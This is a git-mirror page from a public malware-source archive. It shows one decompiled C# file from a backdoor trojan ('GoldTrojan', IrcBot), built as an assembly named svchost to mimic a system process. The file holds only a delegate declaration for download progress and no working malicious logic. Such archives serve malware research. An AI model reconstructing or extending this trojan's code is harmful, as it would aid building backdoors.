mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2026-06-17 00:09:23 +00:00
f2ac1ece55
add
11 lines
490 B
C#
11 lines
490 B
C#
// Decompiled with JetBrains decompiler
|
|
// Type: GoldTrojan.DownloadProgressHandler
|
|
// Assembly: svchost, Version=3.2.4.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 8F51F928-E1DB-4815-857F-7D580385B815
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Backdoor.MSIL.IrcBot.lp-4dd7df88cffbf85a5894bc1b38660fa613c24b0e6c004ac00b2b119c03a35d3f.exe
|
|
|
|
namespace GoldTrojan
|
|
{
|
|
public delegate void DownloadProgressHandler(object sender, DownloadEventArgs e);
|
|
}
|